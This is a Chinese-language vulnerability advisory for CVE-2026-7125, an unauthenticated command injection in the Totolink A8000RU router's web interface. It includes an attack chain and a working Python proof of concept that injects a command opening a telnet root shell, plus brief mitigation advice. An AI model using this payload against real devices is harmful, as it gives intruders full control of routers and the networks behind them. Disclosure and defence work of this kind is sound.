CVE-2026-7125 CVSS 9.8 严重

CVE-2026-7125 Totolink A8000RU 远程命令注入漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7125

漏洞类型

OS命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Totolink A8000RU

漏洞概述

Totolink A8000RU路由器在7.1cu.643_b20200521版本中存在严重的OS命令注入漏洞。该漏洞位于/cgi-bin/cstecgi.cgi文件的setWiFiEasyCfg函数中，由于对merge参数处理不当导致。攻击者无需用户交互及身份认证即可远程发起攻击，执行任意操作系统命令，从而完全控制设备并窃取数据。

技术细节

该漏洞源于Totolink A8000RU路由器Web管理界面的CGI接口处理逻辑缺陷。具体而言，在处理/cgi-bin/cstecgi.cgi请求时，setWiFiEasyCfg函数直接将用户传入的merge参数传递给系统底层命令执行环境，未进行有效的过滤或转义。由于CVSS向量显示无需权限（PR:N）和无需用户交互（UI:N），攻击者可以通过构造恶意的HTTP POST请求，在merge字段中注入Shell元字符（如;、|或&&）。这导致Web服务器后端拼接并执行攻击者指定的任意操作系统命令。鉴于该设备的权限级别，攻击者通常可以获取root权限，从而完全接管路由器，植入后门，修改网络流量或破坏设备固件。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露在互联网上的Totolink A8000RU路由器设备，确认其运行在受影响的7.1cu.643_b20200521版本。

STEP 2

漏洞利用

攻击者向目标设备的/cgi-bin/cstecgi.cgi接口发送特制的HTTP POST请求，在setWiFiEasyCfg函数的merge参数中注入恶意Shell命令。

STEP 3

命令执行

由于未对输入进行过滤，后端系统将攻击者的payload拼接并执行，从而在设备上启动反向Shell或绑定Shell。

STEP 4

建立控制

攻击者获取路由器的Root权限访问，可以修改配置、嗅探流量、安装持久化后门或将设备作为跳板。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://TARGET_IP/cgi-bin/cstecgi.cgi"

# Vulnerable payload for OS Command Injection
# Using semicolon to chain a command (e.g., starting a telnet server)
payload = "; telnetd -l /bin/sh -p 2323"

# Data structure based on the vulnerable function 'setWiFiEasyCfg'
data = {
    "function": "setWiFiEasyCfg",
    "merge": payload
}

# Send the malicious request
# Note: No authentication is required based on the vulnerability description
try:
    response = requests.post(target_url, data=data, timeout=5)
    if response.status_code == 200:
        print("[+] Exploit payload sent successfully.")
        print("[*] Check if telnet is available on port 2323.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

Totolink A8000RU 7.1cu.643_b20200521

防御指南

临时缓解措施

如果无法立即升级固件，建议暂时关闭路由器的远程Web管理功能，并通过ACL（访问控制列表）严格限制能够访问管理界面的IP地址范围。同时，监控网络流量中是否存在针对/cgi-bin/cstecgi.cgi的异常POST请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7125
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7125
3 Details https://www.cvedetails.com/cve/CVE-2026-7125/
4 VulDB https://vuldb.com/cve/CVE-2026-7125
5 Link https://github.com/Litengzheng/vuldb_new2/blob/main/A8000RU/vul_310/README.md
6 Link https://vuldb.com/submit/801006
7 Link https://vuldb.com/vuln/359724
8 Link https://vuldb.com/vuln/359724/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表